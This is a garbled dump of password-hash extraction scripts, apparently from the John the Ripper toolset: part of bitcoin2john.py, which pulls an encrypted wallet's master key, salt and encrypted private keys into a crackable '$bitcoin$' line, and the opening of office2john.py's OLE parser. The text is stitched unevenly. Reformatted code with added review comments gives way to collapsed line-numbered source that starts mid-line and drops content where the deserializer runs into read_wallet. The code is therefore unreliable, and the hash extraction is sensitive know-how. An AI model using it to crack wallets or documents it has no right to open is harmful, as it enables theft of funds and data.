        hexkey = binascii.hexlify(data[1:33])
        if hexkey not in found_hexkeys and check_postkeys(data[33:39], postkeys):
            found_hexkeys.append(hexkey)

    os.close(fd)

    return found_hexkeys


def md5_2(a):
    """MD5 digest (raw bytes) of *a*."""
    return hashlib.md5(a).digest()


def md5_file(nf):
    """MD5 digest (raw bytes) of the file at path *nf*."""
    # BUG FIX: file() is Python 2 only; also open in binary mode so the
    # digest reflects the raw bytes on every platform, and close the handle.
    with open(nf, 'rb') as fh:
        return md5_2(fh.read())


class KEY:
    """Wrapper around an ECDSA keypair.

    NOTE(review): depends on the external `ecdsa` package plus `der` and
    `secp256k1` names defined elsewhere in pywallet, and still uses
    Python 2 hex codecs internally -- left untouched; verify before use
    on Python 3.
    """

    def __init__(self):
        self.prikey = None
        self.pubkey = None

    def generate(self, secret=None):
        """Create a keypair, optionally from a fixed 32-byte secret."""
        if secret:
            exp = int('0x' + secret.encode('hex'), 16)  # NOTE(review): py2-only codec
            self.prikey = ecdsa.SigningKey.from_secret_exponent(exp, curve=secp256k1)
        else:
            self.prikey = ecdsa.SigningKey.generate(curve=secp256k1)
        self.pubkey = self.prikey.get_verifying_key()
        return self.prikey.to_der()

    def set_privkey(self, key):
        """Load a private key from DER (279-byte Bitcoin layout or plain DER)."""
        if len(key) == 279:
            seq1, rest = der.remove_sequence(key)
            integer, rest = der.remove_integer(seq1)
            octet_str, rest = der.remove_octet_string(rest)
            tag1, cons1, rest, = der.remove_constructed(rest)
            tag2, cons2, rest, = der.remove_constructed(rest)
            point_str, rest = der.remove_bitstring(cons2)
            self.prikey = ecdsa.SigningKey.from_string(octet_str, curve=secp256k1)
        else:
            self.prikey = ecdsa.SigningKey.from_der(key)

    def set_pubkey(self, key):
        """Load a public key from its uncompressed SEC representation."""
        key = key[1:]  # strip the 0x04 prefix byte
        self.pubkey = ecdsa.VerifyingKey.from_string(key, curve=secp256k1)

    def get_privkey(self):
        """Serialize the private key to Bitcoin's 279-byte DER layout."""
        _p = self.prikey.curve.curve.p()
        _r = self.prikey.curve.generator.order()
        _Gx = self.prikey.curve.generator.x()
        _Gy = self.prikey.curve.generator.y()
        encoded_oid2 = der.encode_oid(*(1, 2, 840, 10045, 1, 1))
        encoded_gxgy = "\x04" + ("%64x" % _Gx).decode('hex') + ("%64x" % _Gy).decode('hex')
        param_sequence = der.encode_sequence(
            ecdsa.der.encode_integer(1),
            der.encode_sequence(
                encoded_oid2,
                der.encode_integer(_p),
            ),
            der.encode_sequence(
                der.encode_octet_string("\x00"),
                der.encode_octet_string("\x07"),
            ),
            der.encode_octet_string(encoded_gxgy),
            der.encode_integer(_r),
            der.encode_integer(1),
        )
        encoded_vk = "\x00\x04" + self.pubkey.to_string()
        return der.encode_sequence(
            der.encode_integer(1),
            der.encode_octet_string(self.prikey.to_string()),
            der.encode_constructed(0, param_sequence),
            der.encode_constructed(1, der.encode_bitstring(encoded_vk)),
        )

    def get_pubkey(self):
        """Serialize the public key in uncompressed SEC form."""
        return "\x04" + self.pubkey.to_string()

    def sign(self, hash):
        """DER-sign a digest; returns the signature hex-encoded."""
        sig = self.prikey.sign_digest(hash, sigencode=ecdsa.util.sigencode_der)
        return sig.encode('hex')  # NOTE(review): py2-only codec

    def verify(self, hash, sig):
        """Verify a DER signature over a digest."""
        return self.pubkey.verify_digest(sig, hash, sigdecode=ecdsa.util.sigdecode_der)


def bool_to_int(b):
    """Map any truthy value to 1 and any falsy value to 0."""
    if b:
        return 1
    return 0
map_file(self, file, start): # Initialize with bytes from file 430 | self.input = mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) 431 | self.read_cursor = start 432 | def seek_file(self, position): 433 | self.read_cursor = position 434 | def close_file(self): 435 | self.input.close() 436 | 437 | def read_string(self): 438 | # Strings are encoded depending on length: 439 | # 0 to 252 : 1-byte-length followed by bytes (if any) 440 | # 253 to 65,535 : byte'253' 2-byte-length followed by bytes 441 | # 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes 442 | # ... and the Bitcoin client is coded to understand: 443 | # greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string 444 | # ... but I don't think it actually handles any strings that big. 445 | if self.input is None: 446 | raise SerializationError("call write(bytes) before trying to deserialize") 447 | 448 | try: 449 | length = self.read_compact_size() 450 | except IndexError: 451 | raise SerializationError("attempt to read past end of buffer") 452 | 453 | return self.read_bytes(length) 454 | 455 | def write_string(self, string): 456 | # Length-encoded as with read-string 457 | self.write_compact_size(len(string)) 458 | self.write(string) 459 | 460 | def read_bytes(self, length): 461 | try: 462 | result = self.input[self.read_cursor:self.read_cursor + length] 463 | self.read_cursor += length 464 | return result 465 | except IndexError: 466 | raise SerializationError("attempt to read past end of buffer") 467 | 468 | return '' 469 | 470 | def read_boolean(self): return self.read_bytes(1)[0] != chr(0) 471 | def read_int16(self): return self._read_num(' -1: 674 | global addrtype 675 | oldaddrtype = addrtype 676 | addrtype = vers 677 | 678 | db = open_wallet(walletfile, writable=FillPool) 679 | 680 | json_db['keys'] = [] 681 | json_db['pool'] = [] 682 | json_db['tx'] = [] 683 | json_db['names'] = {} 684 | json_db['ckey'] = [] 685 | json_db['mkey'] = {} 686 | 687 | def 
item_callback(type, d): 688 | if type == "tx": 689 | json_db['tx'].append({"tx_id" : d['tx_id'], "txin" : d['txIn'], "txout" : d['txOut'], "tx_v" : d['txv'], "tx_k" : d['txk']}) 690 | 691 | elif type == "name": 692 | json_db['names'][d['hash']] = d['name'] 693 | 694 | elif type == "version": 695 | json_db['version'] = d['version'] 696 | 697 | elif type == "minversion": 698 | json_db['minversion'] = d['minversion'] 699 | 700 | elif type == "setting": 701 | if not json_db.has_key('settings'): json_db['settings'] = {} 702 | json_db["settings"][d['setting']] = d['value'] 703 | 704 | elif type == "defaultkey": 705 | json_db['defaultkey'] = public_key_to_bc_address(d['key']) 706 | 707 | elif type == "key": 708 | addr = public_key_to_bc_address(d['public_key']) 709 | compressed = d['public_key'][0] != '\04' 710 | sec = SecretToASecret(PrivKeyToSecret(d['private_key']), compressed) 711 | hexsec = ASecretToSecret(sec).encode('hex') 712 | private_keys.append(sec) 713 | json_db['keys'].append({'addr' : addr, 'sec' : sec, 'hexsec' : hexsec, 'secret' : hexsec, 'pubkey':d['public_key'].encode('hex'), 'compressed':compressed, 'private':d['private_key'].encode('hex')}) 714 | 715 | elif type == "wkey": 716 | if not json_db.has_key('wkey'): json_db['wkey'] = [] 717 | json_db['wkey']['created'] = d['created'] 718 | 719 | elif type == "pool": 720 | """ d['n'] = kds.read_int64() 721 | d['nVersion'] = vds.read_int32() 722 | d['nTime'] = vds.read_int64() 723 | d['public_key'] = vds.read_bytes(vds.read_compact_size())""" 724 | try: 725 | json_db['pool'].append({'n': d['n'], 'addr': public_key_to_bc_address(d['public_key']), 'addr2': public_key_to_bc_address(d['public_key'].decode('hex')), 'addr3': public_key_to_bc_address(d['public_key'].encode('hex')), 'nTime' : d['nTime'], 'nVersion' : d['nVersion'], 'public_key_hex' : d['public_key'] }) 726 | except: 727 | json_db['pool'].append({'n': d['n'], 'addr': public_key_to_bc_address(d['public_key']), 'nTime' : d['nTime'], 'nVersion' : 
d['nVersion'], 'public_key_hex' : d['public_key'].encode('hex') }) 728 | 729 | elif type == "acc": 730 | json_db['acc'] = d['account'] 731 | sys.stdout.write("Account %s (current key: %s)" % (d['account'], public_key_to_bc_address(d['public_key']))) 732 | 733 | elif type == "acentry": 734 | json_db['acentry'] = (d['account'], d['nCreditDebit'], d['otherAccount'], time.ctime(d['nTime']), d['n'], d['comment']) 735 | 736 | elif type == "bestblock": 737 | pass 738 | # json_db['bestblock'] = d['hashes'][0][::-1].encode('hex_codec') 739 | 740 | elif type == "ckey": 741 | crypted = True 742 | compressed = d['public_key'][0] != '\04' 743 | json_db['keys'].append({ 'pubkey': d['public_key'].encode('hex'), 'addr': public_key_to_bc_address(d['public_key']), 'encrypted_privkey': d['encrypted_private_key'].encode('hex_codec'), 'compressed':compressed}) 744 | 745 | elif type == "mkey": 746 | json_db['mkey']['nID'] = d['nID'] 747 | json_db['mkey']['encrypted_key'] = d['encrypted_key'].encode('hex_codec') 748 | json_db['mkey']['salt'] = d['salt'].encode('hex_codec') 749 | json_db['mkey']['nDerivationMethod'] = d['nDerivationMethod'] 750 | json_db['mkey']['nDerivationIterations'] = d['nDerivationIterations'] 751 | json_db['mkey']['otherParams'] = d['otherParams'] 752 | 753 | if passphrase: 754 | res = crypter.SetKeyFromPassphrase(passphrase, d['salt'], d['nDerivationIterations'], d['nDerivationMethod']) 755 | if res == 0: 756 | logging.error("Unsupported derivation method") 757 | sys.exit(1) 758 | masterkey = crypter.Decrypt(d['encrypted_key']) 759 | crypter.SetKey(masterkey) 760 | 761 | else: 762 | json_db[type] = 'unsupported' 763 | 764 | parse_wallet(db, item_callback) 765 | 766 | 767 | nkeys = len(json_db['keys']) 768 | i = 0 769 | for k in json_db['keys']: 770 | i += 1 771 | addr = k['addr'] 772 | if addr in json_db['names'].keys(): 773 | k["label"] = json_db['names'][addr] 774 | k["reserve"] = 0 775 | 776 | db.close() 777 | 778 | crypted = 'salt' in json_db['mkey'] 779 | 780 
| if not crypted: 781 | sys.stdout.write("%s : this wallet is not encrypted!" % walletfile) 782 | return -1 783 | 784 | for k in json_db['keys']: 785 | if k['compressed'] and 'secret' in k: 786 | k['secret'] += "01" 787 | 788 | if vers > -1: 789 | addrtype = oldaddrtype 790 | 791 | return {'crypted':crypted} 792 | 793 | 794 | 795 | if __name__ == '__main__': 796 | 797 | 798 | if len(sys.argv) < 2: 799 | print >> sys.stderr, "Usage: %s [bitcon wallet files]" % sys.argv[0] 800 | sys.exit(-1) 801 | 802 | for i in range(1, len(sys.argv)): 803 | filename = sys.argv[i] 804 | if read_wallet(json_db, filename, True, True, "", False) == -1: 805 | continue 806 | 807 | # Use btcrecover/btcrpass.py -> "Bitcoin Core" logic in case of problems 808 | # with the code in this file. 809 | minversion = json_db["minversion"] 810 | if minversion > max_version: 811 | sys.stderr.write("WARNING: %s has previously unseen minversion '%s'!\n" % 812 | (os.path.basename(filename), minversion)) 813 | 814 | cry_master = json_db['mkey']['encrypted_key'].decode('hex') 815 | cry_salt = json_db['mkey']['salt'].decode('hex') 816 | cry_rounds = json_db['mkey']['nDerivationIterations'] 817 | cry_method = json_db['mkey']['nDerivationMethod'] 818 | 819 | crypted = 'salt' in json_db['mkey'] 820 | 821 | if not crypted: 822 | print >> sys.stderr, "%s : this wallet is not encrypted" % os.path.basename(filename) 823 | continue 824 | 825 | for k in json_db['keys']: 826 | pass # dirty hack but it works! 
827 | 828 | ckey = k['encrypted_privkey'] 829 | public_key = k['pubkey'] 830 | cry_master = json_db['mkey']['encrypted_key'] 831 | cry_salt = json_db['mkey']['salt'] 832 | 833 | sys.stdout.write("$bitcoin$%s$%s$%s$%s$%s$%s$%s$%s$%s\n" % 834 | (len(cry_master), cry_master, len(cry_salt), 835 | cry_salt, cry_rounds, len(ckey), ckey, len(public_key), 836 | public_key)) 837 | -------------------------------------------------------------------------------- /office2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: latin-1 -*- 3 | """ 4 | OleFileIO_PL: 5 | Module to read Microsoft OLE2 files (also called Structured Storage or 6 | Microsoft Compound Document File Format), such as Microsoft Office 7 | documents, Image Composer and FlashPix files, Outlook messages, ... 8 | 9 | version 0.23 2012-07-25 Philippe Lagadec - http://www.decalage.info 10 | 11 | Project website: http://www.decalage.info/python/olefileio 12 | 13 | Improved version of the OleFileIO module from PIL library v1.1.6 14 | See: http://www.pythonware.com/products/pil/index.htm 15 | 16 | The Python Imaging Library (PIL) is 17 | Copyright (c) 1997-2005 by Secret Labs AB 18 | Copyright (c) 1995-2005 by Fredrik Lundh 19 | OleFileIO_PL changes are Copyright (c) 2005-2012 by Philippe Lagadec 20 | 21 | See source code and LICENSE.txt for information on usage and redistribution. 22 | 23 | WARNING: THIS IS (STILL) WORK IN PROGRESS. 24 | """ 25 | 26 | __author__ = "Fredrik Lundh (Secret Labs AB), Philippe Lagadec" 27 | __date__ = "2012-07-25" 28 | __version__ = '0.23' 29 | 30 | #--- LICENSE ------------------------------------------------------------------ 31 | 32 | # OleFileIO_PL is an improved version of the OleFileIO module from the 33 | # Python Imaging Library (PIL). 
34 | 35 | # OleFileIO_PL changes are Copyright (c) 2005-2012 by Philippe Lagadec 36 | # 37 | # The Python Imaging Library (PIL) is 38 | # Copyright (c) 1997-2005 by Secret Labs AB 39 | # Copyright (c) 1995-2005 by Fredrik Lundh 40 | # 41 | # By obtaining, using, and/or copying this software and/or its associated 42 | # documentation, you agree that you have read, understood, and will comply with 43 | # the following terms and conditions: 44 | # 45 | # Permission to use, copy, modify, and distribute this software and its 46 | # associated documentation for any purpose and without fee is hereby granted, 47 | # provided that the above copyright notice appears in all copies, and that both 48 | # that copyright notice and this permission notice appear in supporting 49 | # documentation, and that the name of Secret Labs AB or the author(s) not be used 50 | # in advertising or publicity pertaining to distribution of the software 51 | # without specific, written prior permission. 52 | # 53 | # SECRET LABS AB AND THE AUTHORS DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS 54 | # SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. 55 | # IN NO EVENT SHALL SECRET LABS AB OR THE AUTHORS BE LIABLE FOR ANY SPECIAL, 56 | # INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM 57 | # LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR 58 | # OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR 59 | # PERFORMANCE OF THIS SOFTWARE. 
60 | 61 | #----------------------------------------------------------------------------- 62 | # CHANGELOG: (only OleFileIO_PL changes compared to PIL 1.1.6) 63 | # 2005-05-11 v0.10 PL: - a few fixes for Python 2.4 compatibility 64 | # (all changes flagged with [PL]) 65 | # 2006-02-22 v0.11 PL: - a few fixes for some Office 2003 documents which raise 66 | # exceptions in _OleStream.__init__() 67 | # 2006-06-09 v0.12 PL: - fixes for files above 6.8MB (DIFAT in loadfat) 68 | # - added some constants 69 | # - added header values checks 70 | # - added some docstrings 71 | # - getsect: bugfix in case sectors >512 bytes 72 | # - getsect: added conformity checks 73 | # - DEBUG_MODE constant to activate debug display 74 | # 2007-09-04 v0.13 PL: - improved/translated (lots of) comments 75 | # - updated license 76 | # - converted tabs to 4 spaces 77 | # 2007-11-19 v0.14 PL: - added OleFileIO._raise_defect() to adapt sensitivity 78 | # - improved _unicode() to use Python 2.x unicode support 79 | # - fixed bug in _OleDirectoryEntry 80 | # 2007-11-25 v0.15 PL: - added safety checks to detect FAT loops 81 | # - fixed _OleStream which didn't check stream size 82 | # - added/improved many docstrings and comments 83 | # - moved helper functions _unicode and _clsid out of 84 | # OleFileIO class 85 | # - improved OleFileIO._find() to add Unix path syntax 86 | # - OleFileIO._find() is now case-insensitive 87 | # - added get_type() and get_rootentry_name() 88 | # - rewritten loaddirectory and _OleDirectoryEntry 89 | # 2007-11-27 v0.16 PL: - added _OleDirectoryEntry.kids_dict 90 | # - added detection of duplicate filenames in storages 91 | # - added detection of duplicate references to streams 92 | # - added get_size() and exists() to _OleDirectoryEntry 93 | # - added isOleFile to check header before parsing 94 | # - added __all__ list to control public keywords in pydoc 95 | # 2007-12-04 v0.17 PL: - added _load_direntry to fix a bug in loaddirectory 96 | # - improved _unicode(), added 
workarounds for Python <2.3 97 | # - added set_debug_mode and -d option to set debug mode 98 | # - fixed bugs in OleFileIO.open and _OleDirectoryEntry 99 | # - added safety check in main for large or binary 100 | # properties 101 | # - allow size>0 for storages for some implementations 102 | # 2007-12-05 v0.18 PL: - fixed several bugs in handling of FAT, MiniFAT and 103 | # streams 104 | # - added option '-c' in main to check all streams 105 | # 2009-12-10 v0.19 PL: - bugfix for 32 bit arrays on 64 bits platforms 106 | # (thanks to Ben G. and Martijn for reporting the bug) 107 | # 2009-12-11 v0.20 PL: - bugfix in OleFileIO.open when filename is not plain str 108 | # 2010-01-22 v0.21 PL: - added support for big-endian CPUs such as PowerPC Macs 109 | # 2012-02-16 v0.22 PL: - fixed bug in getproperties, patch by chuckleberryfinn 110 | # (https://bitbucket.org/decalage/olefileio_pl/issue/7) 111 | # - added close method to OleFileIO (fixed issue #2) 112 | # 2012-07-25 v0.23 PL: - added support for file-like objects (patch by mete0r_kr) 113 | 114 | 115 | #----------------------------------------------------------------------------- 116 | # TODO (for version 1.0): 117 | # - TESTS with Linux, MacOSX, Python 1.5.2, various files, PIL, ... 118 | # - add underscore to each private method, to avoid their display in 119 | # pydoc/epydoc documentation 120 | # - replace all raised exceptions with _raise_defect (at least in OleFileIO) 121 | # - merge code from _OleStream and OleFileIO.getsect to read sectors 122 | # (maybe add a class for FAT and MiniFAT ?) 123 | # - add method to check all streams (follow sectors chains without storing all 124 | # stream in memory, and report anomalies) 125 | # - use _OleDirectoryEntry.kids_dict to improve _find and _list ? 
126 | # - fix Unicode names handling (find some way to stay compatible with Py1.5.2) 127 | # => if possible avoid converting names to Latin-1 128 | # - review DIFAT code: fix handling of DIFSECT blocks in FAT (not stop) 129 | # - rewrite OleFileIO.getproperties 130 | # - improve docstrings to show more sample uses 131 | # - see also original notes and FIXME below 132 | # - remove all obsolete FIXMEs 133 | 134 | # IDEAS: 135 | # - allow _raise_defect to raise different exceptions, not only IOError 136 | # - provide a class with named attributes to get well-known properties of 137 | # MS Office documents (title, author, ...) ? 138 | # - in OleFileIO._open and _OleStream, use size=None instead of 0x7FFFFFFF for 139 | # streams with unknown size 140 | # - use arrays of int instead of long integers for FAT/MiniFAT, to improve 141 | # performance and reduce memory usage ? (possible issue with values >2^31) 142 | # - provide tests with unittest (may need write support to create samples) 143 | # - move all debug code (and maybe dump methods) to a separate module, with 144 | # a class which inherits OleFileIO ? 145 | # - fix docstrings to follow epydoc format 146 | # - add support for 4K sectors ? 147 | # - add support for big endian byte order ? 148 | # - create a simple OLE explorer with wxPython 149 | 150 | # FUTURE EVOLUTIONS to add write support: 151 | # 1) add ability to write a stream back on disk from StringIO (same size, no 152 | # change in FAT/MiniFAT). 
153 | # 2) rename a stream/storage if it doesn't change the RB tree 154 | # 3) use rbtree module to update the red-black tree + any rename 155 | # 4) remove a stream/storage: free sectors in FAT/MiniFAT 156 | # 5) allocate new sectors in FAT/MiniFAT 157 | # 6) create new storage/stream 158 | #----------------------------------------------------------------------------- 159 | 160 | # 161 | # THIS IS WORK IN PROGRESS 162 | # 163 | # The Python Imaging Library 164 | # $Id: OleFileIO.py 2339 2005-03-25 08:02:17Z fredrik $ 165 | # 166 | # stuff to deal with OLE2 Structured Storage files. this module is 167 | # used by PIL to read Image Composer and FlashPix files, but can also 168 | # be used to read other files of this type. 169 | # 170 | # History: 171 | # 1997-01-20 fl Created 172 | # 1997-01-22 fl Fixed 64-bit portability quirk 173 | # 2003-09-09 fl Fixed typo in OleFileIO.loadfat (noted by Daniel Haertle) 174 | # 2004-02-29 fl Changed long hex constants to signed integers 175 | # 176 | # Notes: 177 | # FIXME: sort out sign problem (eliminate long hex constants) 178 | # FIXME: change filename to use "a/b/c" instead of ["a", "b", "c"] 179 | # FIXME: provide a glob mechanism function (using fnmatchcase) 180 | # 181 | # Literature: 182 | # 183 | # "FlashPix Format Specification, Appendix A", Kodak and Microsoft, 184 | # September 1996. 185 | # 186 | # Quotes: 187 | # 188 | # "If this document and functionality of the Software conflict, 189 | # the actual functionality of the Software represents the correct 190 | # functionality" -- Microsoft, in the OLE format specification 191 | # 192 | # Copyright (c) Secret Labs AB 1997. 193 | # Copyright (c) Fredrik Lundh 1997. 194 | # 195 | # See the README file for information on usage and redistribution. 
196 | # 197 | 198 | #------------------------------------------------------------------------------ 199 | 200 | import struct, array, os.path, sys 201 | 202 | PY3 = sys.version_info[0] == 3 203 | 204 | if PY3: 205 | from io import BytesIO as StringIO 206 | else: 207 | from StringIO import StringIO 208 | 209 | #[PL] Define explicitly the public API to avoid private objects in pydoc: 210 | __all__ = ['OleFileIO', 'isOleFile'] 211 | 212 | #[PL] workaround to fix an issue with array item size on 64 bits systems: 213 | if array.array('L').itemsize == 4: 214 | # on 32 bits platforms, long integers in an array are 32 bits: 215 | UINT32 = 'L' 216 | elif array.array('I').itemsize == 4: 217 | # on 64 bits platforms, integers in an array are 32 bits: 218 | UINT32 = 'I' 219 | else: 220 | raise ValueError('Need to fix a bug with 32 bit arrays, please contact author...') 221 | 222 | 223 | #[PL] These workarounds were inspired from the Path module 224 | # (see http://www.jorendorff.com/articles/python/path/) 225 | #TODO: test with old Python versions 226 | 227 | #[PL] Experimental setting: if True, OLE filenames will be kept in Unicode 228 | # if False (default PIL behaviour), all filenames are converted to Latin-1. 229 | KEEP_UNICODE_NAMES = False 230 | 231 | #[PL] DEBUG display mode: False by default, use set_debug_mode() or "-d" on 232 | # command line to change it. 233 | DEBUG_MODE = False 234 | def debug_print(msg): 235 | print(msg) 236 | def debug_pass(msg): 237 | pass 238 | debug = debug_pass 239 | 240 | def set_debug_mode(debug_mode): 241 | """ 242 | Set debug mode on or off, to control display of debugging messages. 
243 | mode: True or False 244 | """ 245 | global DEBUG_MODE, debug 246 | DEBUG_MODE = debug_mode 247 | if debug_mode: 248 | debug = debug_print 249 | else: 250 | debug = debug_pass 251 | 252 | #TODO: convert this to hex 253 | MAGIC = b'\320\317\021\340\241\261\032\341' 254 | 255 | #[PL]: added constants for Sector IDs (from AAF specifications) 256 | MAXREGSECT = 0xFFFFFFFA; # maximum SECT 257 | DIFSECT = 0xFFFFFFFC; # (-4) denotes a DIFAT sector in a FAT 258 | FATSECT = 0xFFFFFFFD; # (-3) denotes a FAT sector in a FAT 259 | ENDOFCHAIN = 0xFFFFFFFE; # (-2) end of a virtual stream chain 260 | FREESECT = 0xFFFFFFFF; # (-1) unallocated sector 261 | 262 | #[PL]: added constants for Directory Entry IDs (from AAF specifications) 263 | MAXREGSID = 0xFFFFFFFA; # maximum directory entry ID 264 | NOSTREAM = 0xFFFFFFFF; # (-1) unallocated directory entry 265 | 266 | #[PL] object types in storage (from AAF specifications) 267 | STGTY_EMPTY = 0 # empty directory entry (according to OpenOffice.org doc) 268 | STGTY_STORAGE = 1 # element is a storage object 269 | STGTY_STREAM = 2 # element is a stream object 270 | STGTY_LOCKBYTES = 3 # element is an ILockBytes object 271 | STGTY_PROPERTY = 4 # element is an IPropertyStorage object 272 | STGTY_ROOT = 5 # element is a root storage 273 | 274 | 275 | # 276 | # -------------------------------------------------------------------- 277 | # property types 278 | 279 | VT_EMPTY=0; VT_NULL=1; VT_I2=2; VT_I4=3; VT_R4=4; VT_R8=5; VT_CY=6; 280 | VT_DATE=7; VT_BSTR=8; VT_DISPATCH=9; VT_ERROR=10; VT_BOOL=11; 281 | VT_VARIANT=12; VT_UNKNOWN=13; VT_DECIMAL=14; VT_I1=16; VT_UI1=17; 282 | VT_UI2=18; VT_UI4=19; VT_I8=20; VT_UI8=21; VT_INT=22; VT_UINT=23; 283 | VT_VOID=24; VT_HRESULT=25; VT_PTR=26; VT_SAFEARRAY=27; VT_CARRAY=28; 284 | VT_USERDEFINED=29; VT_LPSTR=30; VT_LPWSTR=31; VT_FILETIME=64; 285 | VT_BLOB=65; VT_STREAM=66; VT_STORAGE=67; VT_STREAMED_OBJECT=68; 286 | VT_STORED_OBJECT=69; VT_BLOB_OBJECT=70; VT_CF=71; VT_CLSID=72; 287 | 
VT_VECTOR=0x1000; 288 | 289 | # 290 | # -------------------------------------------------------------------- 291 | # Some common document types (root.clsid fields) 292 | 293 | WORD_CLSID = "00020900-0000-0000-C000-000000000046" 294 | #TODO: check Excel, PPT, ... 295 | 296 | #[PL]: Defect levels to classify parsing errors - see OleFileIO._raise_defect() 297 | DEFECT_UNSURE = 10 # a case which looks weird, but not sure it's a defect 298 | DEFECT_POTENTIAL = 20 # a potential defect 299 | DEFECT_INCORRECT = 30 # an error according to specifications, but parsing 300 | # can go on 301 | DEFECT_FATAL = 40 # an error which cannot be ignored, parsing is 302 | # impossible 303 | 304 | 305 | #--- FUNCTIONS ---------------------------------------------------------------- 306 | 307 | def isOleFile (filename): 308 | """ 309 | Test if file is an OLE container (according to its header). 310 | filename: file name or path (str, unicode) 311 | return: True if OLE, False otherwise. 312 | """ 313 | f = open(filename, 'rb') 314 | header = f.read(len(MAGIC)) 315 | if header == MAGIC: 316 | return True 317 | else: 318 | return False 319 | 320 | 321 | #TODO: replace i16 and i32 with more readable struct.unpack equivalent 322 | def i16(c, o = 0): 323 | """ 324 | Converts a 2-bytes (16 bits) string to an integer. 325 | 326 | c: string containing bytes to convert 327 | o: offset of bytes to convert in string 328 | """ 329 | if isinstance(c[o], int): 330 | return c[o] + (c[o+1]<<8) 331 | return ord(c[o])+(ord(c[o+1])<<8) 332 | 333 | 334 | def i32(c, o = 0): 335 | """ 336 | Converts a 4-bytes (32 bits) string to an integer. 
337 | 338 | c: string containing bytes to convert 339 | o: offset of bytes to convert in string 340 | """ 341 | if isinstance(c[o], int): 342 | return c[o] + (c[o+1]<<8) + (c[o+2]<<16) + (c[o+3]<<24) 343 | return int(ord(c[o])+(ord(c[o+1])<<8)+(ord(c[o+2])<<16)+(ord(c[o+3])<<24)) 344 | # [PL]: added int() because "<<" gives long int since Python 2.4 345 | 346 | 347 | def _clsid(clsid): 348 | """ 349 | Converts a CLSID to a human-readable string. 350 | clsid: string of length 16. 351 | """ 352 | assert len(clsid) == 16 353 | if clsid == "\0" * len(clsid): 354 | return "" 355 | return (("%08X-%04X-%04X-%02X%02X-" + "%02X" * 6) % 356 | ((i32(clsid, 0), i16(clsid, 4), i16(clsid, 6)) + 357 | tuple(map(ord, clsid[8:16])))) 358 | 359 | 360 | 361 | # UNICODE support for Old Python versions: 362 | # (necessary to handle storages/streams names which use Unicode) 363 | 364 | try: 365 | # is Unicode supported ? 366 | def _unicode(s, errors='replace'): 367 | """ 368 | Map unicode string to Latin 1. (Python with Unicode support) 369 | 370 | s: UTF-16LE unicode string to convert to Latin-1 371 | errors: 'replace', 'ignore' or 'strict'. See Python doc for unicode() 372 | """ 373 | #TODO: test if it OleFileIO works with Unicode strings, instead of 374 | # converting to Latin-1. 375 | try: 376 | # First the string is converted to plain Unicode: 377 | # (assuming it is encoded as UTF-16 little-endian) 378 | u = s.decode('UTF-16LE', errors) 379 | if KEEP_UNICODE_NAMES: 380 | return u 381 | else: 382 | # Second the unicode string is converted to Latin-1 383 | return u.encode('latin_1', errors) 384 | except: 385 | # there was an error during Unicode to Latin-1 conversion: 386 | raise IOError('incorrect Unicode name') 387 | 388 | except NameError: 389 | def _unicode(s, errors='replace'): 390 | """ 391 | Map unicode string to Latin 1. (Python without native Unicode support) 392 | 393 | s: UTF-16LE unicode string to convert to Latin-1 394 | errors: 'replace', 'ignore' or 'strict'. 
# ---------------------------------------------------------------------------
# NOTE(review): _OleStream (office2john.py/OleFileIO_PL, original lines
# 394-537, extraction-collapsed).  The physical line below also carries the
# tail of the fallback _unicode() ("return filter(ord, s)") whose head sits
# on the previous chunk.  _OleStream.__init__ reads a whole OLE stream by
# walking the FAT/MiniFAT chain with a *bounded* for-loop (explicit DoS
# guard), validating each sector index against the FAT before seek/read,
# then hands the concatenated bytes to StringIO/BytesIO so the object acts
# as a read-only file.  size==0x7FFFFFFF marks "size unknown" (Directory
# stream), reconciled after the walk in a three-way branch.  Left
# byte-identical: the seek/read/length-check/append/advance statement order
# and the final size reconciliation are easy to break in a restyle.
# ---------------------------------------------------------------------------
(ignored in this version) 395 | """ 396 | # If the unicode function does not exist, we assume this is an old 397 | # Python version without Unicode support. 398 | # Null bytes are simply removed (this only works with usual Latin-1 399 | # strings which do not contain unicode characters>256): 400 | return filter(ord, s) # this is bullshit! 401 | 402 | 403 | 404 | #=== CLASSES ================================================================== 405 | 406 | #--- _OleStream --------------------------------------------------------------- 407 | 408 | class _OleStream(StringIO): 409 | """ 410 | OLE2 Stream 411 | 412 | Returns a read-only file object which can be used to read 413 | the contents of an OLE stream (instance of the StringIO class). 414 | To open a stream, use the openstream method in the OleFile class. 415 | 416 | This function can be used with either ordinary streams, 417 | or ministreams, depending on the offset, sectorsize, and 418 | fat table arguments. 419 | 420 | Attributes: 421 | - size: actual size of data stream, after it was opened. 422 | """ 423 | 424 | # FIXME: should store the list of sects obtained by following 425 | # the fat chain, and load new sectors on demand instead of 426 | # loading it all in one go. 427 | 428 | def __init__(self, fp, sect, size, offset, sectorsize, fat, filesize): 429 | """ 430 | Constructor for _OleStream class.
431 | 432 | fp : file object, the OLE container or the MiniFAT stream 433 | sect : sector index of first sector in the stream 434 | size : total size of the stream 435 | offset : offset in bytes for the first FAT or MiniFAT sector 436 | sectorsize: size of one sector 437 | fat : array/list of sector indexes (FAT or MiniFAT) 438 | filesize : size of OLE file (for debugging) 439 | return : a StringIO instance containing the OLE stream 440 | """ 441 | debug('_OleStream.__init__:') 442 | debug(' sect=%d (%X), size=%d, offset=%d, sectorsize=%d, len(fat)=%d, fp=%s' 443 | %(sect,sect,size,offset,sectorsize,len(fat), repr(fp))) 444 | #[PL] To detect malformed documents with FAT loops, we compute the 445 | # expected number of sectors in the stream: 446 | unknown_size = False 447 | if size==0x7FFFFFFF: 448 | # this is the case when called from OleFileIO._open(), and stream 449 | # size is not known in advance (for example when reading the 450 | # Directory stream). Then we can only guess maximum size: 451 | size = len(fat)*sectorsize 452 | # and we keep a record that size was unknown: 453 | unknown_size = True 454 | debug(' stream with UNKNOWN SIZE') 455 | nb_sectors = (size + (sectorsize-1)) / sectorsize 456 | nb_sectors = int(nb_sectors) 457 | # print('nb_sectors = %d' % nb_sectors) 